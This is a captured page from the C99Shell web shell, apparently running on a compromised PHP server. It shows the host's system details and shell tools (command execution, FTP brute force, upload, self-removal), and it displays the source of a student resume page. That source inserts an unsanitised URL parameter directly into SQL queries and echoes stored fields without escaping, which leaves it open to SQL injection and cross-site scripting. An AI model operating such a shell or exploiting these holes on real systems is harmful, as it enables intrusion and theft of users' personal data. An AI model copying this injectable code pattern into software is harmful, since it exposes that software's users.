!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.18.0. PHP/7.4.29 

uname -a: Linux ip-172-31-23-220 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/   drwxr-xr-x
Free 39.75 GB of 48.28 GB (82.35%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     profile_common.php (24.59 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<meta name="keywords" content="Free Resume Builder, Create Your Resume Online, create resume, make resume, cv create, online resume builder"/>

  <meta name="description" content="Free Resume Builder. Optimize your resume for a specific job using our Job-Resume Optimizer. Get hired faster! Update your resume in Srishti Campus website!">

<?php

require 'connection.php';
//echo $u_id=$_GET['id'];
$string =$_GET['id'];
$chunks explode("_"$string);
//print_r($chunks);
  
$u_id$chunks['1'];
include 
'public_header.php';
//die();
// if (isset($_SESSION['user_id']))
// {
//     include 'header.php';
// }
// else
// {
//     include 'public_header.php';
// }
//die();
?>

<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Roboto:wght@100;300;400;500;700;900&display=swap" rel="stylesheet">
<body>

<style>

    body{ padding: 0; margin: 0;

    }

       h1, h2, h3, h4, h5, h6 {

        font-weight: 700;

    }

    h3 {

        font-size: 1rem;

    }

    a {

        color: #2d7788;

    }



    a:hover {

        text-decoration: underline;

        color: #1a454f;

        -webkit-transition: all 0.4s ease-in-out;

        -moz-transition: all 0.4s ease-in-out;

        -ms-transition: all 0.4s ease-in-out;

        -o-transition: all 0.4s ease-in-out;

    }



    a:focus {

        text-decoration: none;

    }



    p {

        line-height: 1.5;

    }

  

    

    

.wrapper_Outer  {

    position: relative;

    font-family: 'Roboto', sans-serif !important;

   /* height: 100%;*/

    border: solid 1px #ccc;

    float: left;

    margin: 30px 0;

    background: #FFF;

    display: flex;

}

.wrapper_resume {

    max-width: 1000px;

    margin: 0 auto;

}



.sidebar-wrapper {

    background: #32333a;

    float: right;

    width: 300px;

    min-height: 100%;

    color: #fff;

    padding: 25px 0;

}

    

.main-wrapper {

    background: #fff;

    padding: 30px;

    width: calc(100% - 360px);

    min-height: 100%;

    float: left;

}    

.profileImg {

    width: 165px;

    height: 165px;

    margin: 0 auto;

    overflow: hidden;

    border-radius: 100%;

    border: 5px solid #FFF;

}

.profileImg img{ height: 165px; object-fit: cover;  }

    

.sidebar-wrapper .subtitles {

    font-weight: 400;

    text-transform: uppercase;

    border-left: 15px solid #ff9800;

    float: left;

    width: 100%;

    padding: 7px 10px;

    font-size: 18px;

    letter-spacing: 0.2px;

    margin: 10px 0 15px;

    background: #65666d;



.sidebar-wrapper .list-style{ list-style: none; padding: 0; margin: 0; float: left;  width: 100%;     margin-left: 10px;}

    

.sidebar-wrapper .list-style li {

    margin-bottom: 15px;

    /*word-break: break-all;*/

    word-break: inherit;

    float: left;

    width: 100%;

    line-height: 20px;

    font-size: 14px;

    font-weight: 300;

}   

.sidebar-wrapper .list-style li:last-child{  margin-bottom: 0; }

    

.sidebar-wrapper .list-style li label{ display: block; margin-bottom: 5px; font-weight: 400 !important; font-size: 16px; letter-spacing: 0.2px; } 

    

.sidebar-wrapper .list-style li .icons  { font-size: 15px; float: left; width: 35px; }

    

.sidebar-wrapper .list-style li .conts{ float: left; width: calc(100% - 35px); font-weight: 300;  }

    

.sidebar-wrapper a {   color: #fff;} 

    

.sidebar-wrapper .container-block {

    padding: 15px 20px;

    float: left;

    width: calc(100% - 5px);



.main-wrapper p {

    color: #444;

    font-size: 14px;

 }

.main-wrapper .section-title {

    text-transform: uppercase;

    font-size: 18px;

    font-weight: 500;

    color: #111;

    position: relative;

    margin: 10px 0;

    letter-spacing: 0.2px;

    border-left: 16px solid #ff9800;

    background: #cccccc78;

    padding: 7px 10px;





 .download-resume{

    font-size: 22px;

   margin-left: 73%; 

}    



.main-wrapper .experiences-section .item {

   margin-bottom: 30px;

}

.main-wrapper .upper-row {

    margin: 0px;

    font-size: 14px;

    float: left;

    width: calc(100% - 140px);

    padding-bottom: 10px;

    border-bottom: 1px solid #66666633;

}

.experiences-section .upper-row{  border-bottom:0; }

.meta .time_summary {

    width: 140px;

    float: left;

    font-size: 14px;

    color: #666;

    font-weight: 400;

}

.upper-row .subs-title {  margin: 0 0 10px;     color: #333;    }

  

.upper-row .details_sec {

    margin: 5px 0;

    color: #555;

    font-size: 14px;

}

.section{ float: left; width: 100%; }

    

.details_sec.val_perc {

    font-weight: 600;

    font-size: 15px;

    margin: 10px 0 5px;

}

.main-wrapper .meta {

    float: left;

    width: 100%;

    margin: 10px 0;   

}

.main-wrapper h1.name {

    font-size: 40px;

    font-weight: 500;

    text-transform: uppercase;

    letter-spacing: 0.2px;

    margin: 40px 0 0;

    padding: 0;

    line-height: inherit;  

}

.main-wrapper h2.designation {

    color: #ff9800;

    font-weight: 500;

    font-size: 20px;

    text-transform: uppercase;

    letter-spacing: 0.2px;

    margin: 0 0 73px;

    padding: 5px 0;

 }

 

.main-wrapper ul.summary {

    margin: 0;

    list-style: none;

    padding: 5px 0 15px;

    font-size: 14px;

    color: #333;   

 }

 i.fas.fa-phone {

    transform: scaleX(-1);

}

.main-wrapper ul.summary li {  margin: 0 0 10px; } 

    

    

</style>

<?php

       

        $sql1 
"select * from user_details where user_id='$u_id'";

        
$result1 $con->query($sql1);

        
$row1 $result1->fetch_assoc();?>    

  <title>Resume | <?php echo $row1['name']; ?></title> 

<!-- <section class="project-banner">

    <div class="container">

        <div class="banner-sec">

            <div class="projectheading btn_right">

                <h3>RESUME</h3>

                

            </div>

        </div>

    </div>

</section> -->

<div class="details download-resume" >

    <!-- <a href="resume-pdf.php" target="_blank" ><i class="fas fa-file-pdf"></i> Download PDF</a> -->

    <!-- <a href="aj_pdf.php" target="_blank" ><i class="fas fa-file-pdf"></i> Download PDF</a> -->

</div>

    

<div class="wrapper_resume">

    <div class="wrapper_Outer" style="box-shadow: 0 6px 12px 0 rgb(0 0 0 / 27%), 0 10px 25px 0 rgb(0 0 0 / 25%);">

        <section class="sidebar-wrapper">

        

        <?php

        $sql 
"select * from student_reg where user_id='$u_id'";

        
$result $con->query($sql);

        
$row $result->fetch_assoc();

        
$sql1 "select * from user_details where user_id='$u_id'";

        
$result1 $con->query($sql1);

        
$row1 $result1->fetch_assoc();



         
$public_profile_val=$row1['public_profile_val'];

        
// if($public_profile_val=='')

        // {

        //     echo "Public view not Available";

        // }

        
if($public_profile_val=='false')

        {

            echo 
"Public view not Available";

        }

        if(
$public_profile_val=='true' OR $public_profile_val=='')

        {

            

       

        
?>

        <div class="profileImg">

            <?php 

            
if($row['profileImage']=='')

            {

                
?>

                <!-- <img src="profile_default.jpg"> -->

                <!-- <img src="https://www.srishticampus.com/images/sics.png"> -->
                <img src="https://www.srishticampus.com/images/imgpsh_fullsize_anim_logo.png">

                <?php

            
}

            else

            {

               
$img='https://www.srishticampus.com/profileImages/'.$row['profileImage'];

                
?>

              <img src="<?php echo $img;?>">

                

                <?php

            
}

            
?>

            

        </div>

        <div class="contact-container container-block" style="margin-top: 15px;">

            <!-- <h6 class="subtitles">Basic Details</h6> -->

            <ul class="list-style">

                <li class="email">

                    <span class="icons"><i class="fas fa-envelope" aria-hidden="true"></i></span>

                    <span class="conts">

                        <label>Email</label>

                        <?php echo $row1['email']; ?>

                    </span>

                </li>

                <li class="email">

                    <span class="icons"><i class="fas fa-phone" aria-hidden="true"></i> </span>

                    <span class="conts">

                        <label>Phone</label>

                        <?php //echo $row1['phone']; ?>

                        xxxxxxxxxx

                    </span>

                </li>

                

              <!--   <li class="linkedin">

                    <span class="icons"><i class="fa fa-calendar" aria-hidden="true"></i></span>

                    <span class="conts">

                        <label>Date of Birth</label>

                        <?php //echo $row['dob']; ?>

                    </span>

                </li> -->



            </ul>

        </div>

        





      

        <div class="interests-container container-block">

            

                <?php

            $array 
explode(','$row['core_skill']);

            if(!empty(
$array[0]))

            {

                
?>

            <h6 class="subtitles">CORE COMPETENCY</h6>

            <ul class="list-style">

                <?php

            
foreach ($array as $item) {?>

                <li>

                <span class="icons"><i class="fa fa-dot-circle-o" aria-hidden="true"></i> </span>

                    <span class="conts">

                        <?php echo $item;?> 

                    </span>

                </li>

                 <?php ?>   

                <!-- <li>

                <span class="icons"><i class="fa fa-dot-circle-o" aria-hidden="true"></i> </span>

                    <span class="conts">

                      

                    </span>

                </li>    -->                                                



            </ul>

            <?php

            
}?>

        </div>



        <div class="interests-container container-block">

             

            <?php

            $array 
explode(','$row['strengths']);

             if(!empty(
$array[0]))

            {

                
?>

                <h6 class="subtitles">STRENGTHS</h6>

                <ul class="list-style"> 

                <?php

            
foreach ($array as $item) {?>

                <li>

                    <span class="icons"><i class="fa fa-dot-circle-o" aria-hidden="true"></i> </span>

                    <span class="conts">

                    

                    <?php echo $item;?> 

                     </span>

                </li>

                <?php ?>                                    

                <!-- <li>

                <span class="icons"><i class="fa fa-dot-circle-o" aria-hidden="true"></i> </span>

                    <span class="conts">

                        <?php //echo $row['strengths']; ?>

                    </span>

                </li> -->

                <!-- <li>

                <span class="icons"><i class="fa fa-dot-circle-o" aria-hidden="true"></i> </span>

                    <span class="conts">

                       

                    </span>

                </li> -->



            </ul>

            <?php

            
}?>

        </div>



        <div class="contact-container container-block">

            <?php

            
if($row['permanent_address1']!='')

            {

                
?>



            <h6 class="subtitles">Address</h6>

            <ul class="list-style">

                <li class="address">

                    <span class="icons"><i class="fas fa-map-marker" aria-hidden="true"></i> </span>

                    <span class="conts">

                        <label>Permanent Address</label>

                        <?php echo $row['permanent_address1'].'<br>'?>

                        <?php

                        
if($row['permanent_address2']!='')

                        {

                         echo 
$row['permanent_address2'].'<br>';

                        }

                         
?>

                        <?php 

                        
if($row['permanent_addres3']!='')

                        {

                           echo 
$row['permanent_addres3'].'<br>'

                        }

                         
?>

                        <?php echo $row['permanent_pincode']; ?>



                

                        

                    </span>

                </li>

                

            </ul>

            <?php

            
}

            
?>

        </div>











        <!--//interests-->



      



    </section>

    <!--//sidebar-wrapper-->

    <section class="main-wrapper">

        <div class="section summary-section">

            <h1 style="margin-top: -20px;" class="name"><?php echo $row1['name']; ?></h1>

            <!-- <h2 class="designation"> UI Developer</h2> -->

            <?php 

            
if($row['career_objective']!='')

            {

                
?>

                <h3 class="section-title">Career Objective</h3>

                <div class="summary">

                    <p>



                        <?php echo $row['career_objective']; ?>

                        <!-- Work for an organization which provides me the opportunity to improve my skills and knowledge to grow. Proin leo arcu, lacinia porttitor magna in, ultrices convallis turpis. Praesent dictum eu enim nec convallis. Quisque ullamcorper scelerisque hendrerit. Proin sodales lorem sit amet lacinia tempor. Nullam quis sem lobortis, rutrum sapien fringilla, bibendum libero. Aenean semper odio vel neque rutrum volutpat.  -->

                    </p>

                </div>

                <!--//Summary End-->

                <?php

            
}
            else
            {
                
?>
                 <h3 class="section-title">Career Objective</h3>

                <div class="summary">

                    <p>
                        Self-motivated, highly passionate and hardworking fresher looking for an opportunity to work in a challenging organization to utilize my skills and knowledge to work for the growth of the organisation
                    </p>

                </div>
                
                <?php
            
}

            
?>

            

        </div>



                <?php

                $id 
$row['stud_id'];

                
$sql2 "select * from experience where stud_id=$id";

                
$result2 $con->query($sql2);

                
$row2 $result2->fetch_assoc();

                if(
$row2['position']!='')

                {
?>

        

                    <div class="section experiences-section">

                            <h3 class="section-title">Work Experience</h3>

                            <?php

                            $id 
$row['stud_id'];

                            
$sql2 "select * from experience where stud_id=$id";

                            
$result2 $con->query($sql2);

                            while (
$row2 $result2->fetch_assoc()) 

                            {
?>

                            <div class="meta">

                                <div class="time_summary"><span><?php echo $row2['duration']; ?></span></div>



                                <div class="upper-row">

                                    <h3 class="subs-title"><?php echo $row2['position']; ?></h3>

                                    <div class="details_sec"><?php echo $row2['company_name']; ?></div>

                                 </div>

                            </div>

                            <?php 

                            
}

                            
?>

                        

                           

                    </div>

                <?php 

                
}

                
?>

        <!--//Experience End-->



            <?php

            $sql1 
"select * from resume_projects where stud_id=$id";

            
$result1 $con->query($sql1);

            
$row1 $result1->fetch_assoc();



              if(
$row1['pro_name']!='')

              {  

                
?>

                    <div class="section projects-section">

                        <h3 class="section-title">Projects</h3>

                        <?php

                        $sql1 
"select * from resume_projects where stud_id=$id";

                        
$result1 $con->query($sql1);

                        while (
$row1 $result1->fetch_assoc()) {

                            
$acad='';

                            if(
trim($row1["acadamic"])=="Academic"){

                                
$acad='[Academic Project]';

                            }
?>

                        <div class="meta">

                                <div class="prj_name time_summary">Project undertaken</div>

                                <div class="upper-row">

                                    <h3 class="subs-title">

                                        <?php echo $row1['pro_name']; ?>

                                    </h3>

                                    <div class="details_sec">

                                         <?php echo $row1['description']; ?>

                                    </div>

                                    <div class="details_sec">Technology:&nbsp;<?php echo $row1['technology']; ?></div>

                                </div>

                         </div>

                         <?php 

                            
}

                            
?>

                       

                    </div>

            <?php 

                
}

                
?>

        <!--//Project End-->

        <?php 

        
if(!empty($row['achievements'])){

        
?>

        <div class="section experiences-section">

            <h3 class="section-title">Achievements</h3>



            <ul class="summary"> 

                <?php

            $array 
explode(','$row['achievements']);



            foreach (
$array as $item) {?>

                <li>

                    <i class="fa fa-dot-circle-o" aria-hidden="true"></i>&nbsp;

                    <?php echo $item;?> 

                </li>

                <?php ?>

                <!-- <li>

                    <i class="fa fa-dot-circle-o" aria-hidden="true"></i>&nbsp;  

                    sdggdfasfsdggdfasfsdggdfasf  sdggdfasfsdggdfasfv 

                </li>   --> 

            </ul>

        </div>

        <?php ?>

        <!--//skills End-->



         <div class="section experiences-section">

            

                <?php

            $array 
explode(','$row['interest']);

            if(!empty(
$array[0]))

            {

                
?>

                <h3 class="section-title">Interests</h3>

            <ul class="summary">

                <?php

            

            
foreach ($array as $item) {?>

                <li>

                    <i class="fa fa-dot-circle-o" aria-hidden="true"></i>&nbsp;

                    <?php echo $item;?> 

                </li>

                <?php ?>

                <!-- <li><?php //echo $row['interest']; ?></li>      -->                                               



            </ul>

            <?php

            
}

            
?>

          

        </div>





        <div class="section education-section">

            <?php

                $id 
$row['stud_id'];

                
$sql2 "select * from education where stud_id=$id";

                
$result2 $con->query($sql2);

                
$row2 $result2->fetch_assoc();

                if(
$row2["course"]!='')

                {

                   

                

                
?>



                <h3 class="section-title">Education</h3>

                <?php

                $id 
$row['stud_id'];

                
$sql2 "select * from education where stud_id=$id";

                
$result2 $con->query($sql2);

                while (
$row2 $result2->fetch_assoc()) {

                
?>

                <div class="meta">

                    <div class="time_summary"><span><?php echo $row2["year"];?></span> </div>



                    <div class="upper-row">

                        <h3 class="subs-title"><?php echo $row2["course"];?></h3>

                        <div class="details_sec"><?php echo $row2["board"];?></div>

                        <div class="details_sec"><?php echo $row2["specification"];?></div>

                        

                        <div class="details_sec val_perc">

                           <label>CGPA:</label><?php echo $row2["mark"];?><span>%</span>

                        </div>

                     </div>

                </div>

                <?php }

            }

?>

    
    <div class="row align-items-center mt-4">
                                            <div class="col">
                                                 &nbsp;&nbsp;&nbsp;&nbsp;I,&nbsp; hereby declare that the information furnished above is true to the best of my knowledge and belief.

                                               
                                            </div>

                                        

                                        </div>

                                         <div class="row align-items-center mt-4">
                                            

                                            <div class="col">
                                                <?php 
                                                    $currentDateTime 
date('Y-m-d ');
                                                    echo 
$currentDateTime;
                                                    
?>

                                               
                                            </div>
                                            <div class="col" style="text-align: right;">
                                                 <?php
                                                  $sql1 
"select * from user_details where user_id='$u_id'";
                                                    
$result1 $con->query($sql1);
                                                    
$row1 $result1->fetch_assoc();
                                                     echo 
$row1['name']; ?>

                                               
                                            </div>

                                        </div>
            

                <!-- <div class="meta">

                    <div class="time_summary"><span>2015</span> - <span>2018</span></div>



                    <div class="upper-row">

                        <h3 class="subs-title">BA in Computer Science</h3>

                        <div class="details_sec">University College Trivandrum</div>

                        <div class="details_sec">

                            Batch topper

                        </div>

                        <div class="details_sec val_perc">

                           <label>CGPA:</label> 85<span>%</span>

                        </div>

                     </div>

                 </div>  -->

        </div>

        <!--//Education End-->



        <?php 

    
}

    
?>
    </section>
    <!--main-wrapper end-->
    </div>
</div>
<script  type="text/javascript" src="https://www.srishticampus.com/js/fontawesome.js"></script>
<?php
include 'public_footer.php';
?>
<script type="text/javascript">
      document.addEventListener('contextmenu', event => event.preventDefault());
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0075 ]--